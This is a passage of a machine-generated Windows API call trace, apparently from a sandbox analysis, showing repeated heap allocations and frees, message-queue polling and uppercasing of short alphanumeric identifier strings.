hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0215.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0215.037] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0215.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72298 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0215.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0215.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab548 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0215.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0215.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0215.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8a8 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab920 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0215.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0215.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0215.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.039] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0215.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0215.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.039] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0215.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0215.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0215.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0215.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0215.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab860 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9b0 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0215.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0215.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab908 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0215.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0215.042] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0215.043] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab800 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0215.043] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0215.043] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.043] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.043] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0215.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0215.044] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0215.044] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8f0 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73db8 [0215.044] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0215.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.044] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0215.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0215.045] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0215.045] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 